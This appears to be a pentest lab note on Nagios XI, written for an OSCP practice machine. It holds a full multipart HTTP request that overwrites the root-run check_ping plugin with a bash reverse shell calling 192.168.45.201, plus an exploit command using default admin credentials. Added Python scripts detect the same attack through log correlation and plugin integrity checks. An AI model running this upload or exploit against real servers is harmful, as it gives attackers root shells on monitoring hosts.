Pentesting Nagios
Nagios XI is a popular and widely used commercial monitoring solution for IT infrastructure and network monitoring. It is the commercial version of the open-source Nagios Core monitoring platform, and provides added features to simplify the process of managing complex IT environments.
Login is usually at: http://$target/nagiosxi/login.php
Default password
Version
Once logged in, check the version:
![[nagiosversion.png]]
Nagios has well-known vulnerabilities associated with specific versions.
Well-known CVEs
Source: https://www.exploit-db.com/exploits/52138
Exploited in the OSCP machine "Monitoring".
Manual exploitation
The check_ping plugin runs with root permissions when this endpoint is triggered: http://192.168.188.136/nagiosxi/includes/components/profile/profile.php?cmd=download
Because of that, it can be overwritten with a reverse shell by uploading a plugin file named check_ping through the plugin upload page:
```http
POST /nagiosxi/admin/monitoringplugins.php HTTP/1.1
Host: 192.168.188.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------10820201625104408392403571266
Content-Length: 706
Referer: http://192.168.188.136/nagiosxi/admin/monitoringplugins.php
Origin: http://192.168.188.136
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Connection: keep-alive
Cookie: nagiosxi=ddb4n235m0cumv1bog5dqd29r3

-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="upload"

1
-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="nsp"

b81aa9c5366779e92ea0800832c4ce99ff6acee42a8a2a33e2f52ef7bbd1b98e
-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="MAX_FILE_SIZE"

20000000
-----------------------------10820201625104408392403571266
Content-Disposition: form-data; name="uploadedfile"; filename="check_ping"
Content-Type: application/octet-stream

bash -c 'bash -i >& /dev/tcp/192.168.45.201/3333 0>&1'
-----------------------------10820201625104408392403571266--
```
Beforehand, start a netcat listener on port 3333 on your Kali machine.
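From the defender's side, the sequence above leaves a distinctive trace in the web server access log: a POST to the plugin upload page followed shortly by a GET to the profile download endpoint from the same client. The script below is an added example (not part of this note or of Nagios XI) that parses Apache combined-format log lines and correlates those two events. The log lines are constructed samples, the 10-minute window is an arbitrary choice, and both endpoint paths are taken from the request above; adjust the paths if your install uses a different base URL.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-log lines (not captured from a real server).
# The paths are the plugin upload page and the profile download endpoint
# discussed above; 10.0.0.7 uploads but never triggers, 10.0.0.9 triggers
# without uploading.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Dec/2025:10:40:01 +0000] "GET /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Dec/2025:10:41:10 +0000] "POST /nagiosxi/admin/monitoringplugins.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Dec/2025:10:41:12 +0000] "GET /nagiosxi/includes/components/profile/profile.php?cmd=download HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Dec/2025:10:50:00 +0000] "POST /nagiosxi/admin/monitoringplugins.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Dec/2025:11:02:33 +0000] "GET /nagiosxi/includes/components/profile/profile.php?cmd=download HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
"""

UPLOAD_PATH = "/nagiosxi/admin/monitoringplugins.php"
TRIGGER_PATH = "/nagiosxi/includes/components/profile/profile.php"

# Apache combined log: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def detect_plugin_upload_then_trigger(log_text, window=timedelta(minutes=10)):
    """Return every plugin-upload POST grouped by client IP, plus an alert for
    each upload that the same IP followed within `window` with the profile
    download request that runs the plugins."""
    uploads = {}   # ip -> list of timestamps of POSTs to the plugin upload page
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"].startswith(UPLOAD_PATH):
            uploads.setdefault(ev["ip"], []).append(ev["ts"])
        elif ev["path"].startswith(TRIGGER_PATH) and "cmd=download" in ev["path"]:
            # Correlate with any earlier upload from the same client inside the window.
            for t in uploads.get(ev["ip"], []):
                if timedelta(0) <= ev["ts"] - t <= window:
                    alerts.append({"ip": ev["ip"], "upload_at": t, "trigger_at": ev["ts"]})
                    break
    return {"uploads": uploads, "alerts": alerts}


if __name__ == "__main__":
    result = detect_plugin_upload_then_trigger(SAMPLE_LOG)
    for ip in result["uploads"]:
        print(f"plugin upload from {ip}")
    for a in result["alerts"]:
        print(f"ALERT {a['ip']}: upload at {a['upload_at']} then plugin run at {a['trigger_at']}")
```

Plugin uploads through the web UI should be rare on a production Nagios XI server, so the bare upload list is worth reviewing on its own; the correlated alert is the higher-confidence signal.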
Automatic exploitation
Run the exploit with:
```bash
python3 exploit.py -t http://192.168.188.136/ -b /nagiosxi/ -u "nagiosadmin" -p "admin" -lh 192.168.45.201 -lp 4444 -k
```
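Whichever route is used, the end state on the host is the same: a compiled plugin that runs as root has been replaced by a script. A file-integrity baseline of the plugin directory catches that regardless of how the upload happened. The script below is an added example written for this note, not code from Nagios or from the exploit above; it hashes every plugin, records its mode and whether it starts with an ELF header, and reports plugins that changed, were replaced by a non-ELF file, gained the setuid bit, or were added or removed. The plugin directory path is an assumption to be set for your install; `demo()` builds a throwaway directory with a constructed fake ELF plugin so the audit can run offline.

```python
import hashlib
import os
import shutil
import stat
import tempfile

# Assumed location of the plugin binaries; set this for your own install.
PLUGIN_DIR = "/path/to/nagios/plugins"


def hash_file(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def is_elf(path):
    """True if the file begins with the ELF magic bytes."""
    with open(path, "rb") as f:
        return f.read(4) == b"\x7fELF"


def build_baseline(plugin_dir):
    """Record hash, permission bits and ELF-ness of every regular file in the directory."""
    baseline = {}
    for name in sorted(os.listdir(plugin_dir)):
        p = os.path.join(plugin_dir, name)
        if os.path.isfile(p):
            mode = stat.S_IMODE(os.stat(p).st_mode)
            baseline[name] = {"sha256": hash_file(p), "mode": mode, "is_elf": is_elf(p)}
    return baseline


def audit(plugin_dir, baseline):
    """Compare the directory against a saved baseline; return (name, reason) findings."""
    findings = []
    current = build_baseline(plugin_dir)
    for name, rec in current.items():
        base = baseline.get(name)
        if base is None:
            findings.append((name, "new plugin not in baseline"))
            continue
        if rec["sha256"] != base["sha256"]:
            findings.append((name, "content changed"))
        if base["is_elf"] and not rec["is_elf"]:
            findings.append((name, "compiled plugin replaced by a script"))
        if (rec["mode"] & stat.S_ISUID) and not (base["mode"] & stat.S_ISUID):
            findings.append((name, "setuid bit added"))
    for name in baseline:
        if name not in current:
            findings.append((name, "plugin removed"))
    return findings


def demo():
    """Build a temporary plugin dir, baseline it, simulate a plugin overwrite, audit."""
    d = tempfile.mkdtemp()
    try:
        plugin = os.path.join(d, "check_ping")
        with open(plugin, "wb") as f:
            f.write(b"\x7fELF" + b"\x00" * 60)   # constructed stand-in for a compiled plugin
        os.chmod(plugin, 0o755)
        baseline = build_baseline(d)
        # Simulate the overwrite: the binary becomes a (harmless) shell script.
        with open(plugin, "wb") as f:
            f.write(b"#!/bin/bash\necho replaced\n")
        return audit(d, baseline)
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

In practice, save the baseline (for example as JSON) right after a clean install or upgrade, store it somewhere the web server account cannot write, and run `audit()` from cron or your monitoring itself; any finding on a plugin that runs as root warrants an immediate look.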
Last update: 2025-12-14
Created: December 14, 2025 10:44:38